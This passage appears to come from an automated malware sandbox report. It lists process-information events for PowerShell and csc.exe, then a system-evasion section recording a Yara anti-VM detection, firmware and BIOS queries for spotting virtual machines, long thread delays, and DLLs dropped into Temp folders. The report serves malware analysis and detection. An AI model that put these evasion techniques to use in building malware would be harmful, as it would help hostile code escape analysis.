            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8068, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7228, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5656, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR
            Query firmware table information (likely to detect VMs)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: B50000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: 2730000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: C60000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 4320000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 46C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 43A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010ED152 sgdt fword ptr [eax+eax]41_2_010ED152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010FCFBA sldt word ptr [eax]41_2_010FCFBA
            Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6186
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2223
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6350
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2081
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6028
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3561
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4989
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4745
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.dllJump to dropped file
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7812Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7824Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7808Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7368Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2740Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6864Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 332Thread sleep count: 6350 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep time: -17524406870024063s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1996Thread sleep count: 2081 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6816Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6704Thread sleep time: -21213755684765971s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6476Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2156Thread sleep count: 4989 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -16602069666338586s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5652Thread sleep count: 4745 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7664Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2508Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2976Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4032Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3364Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
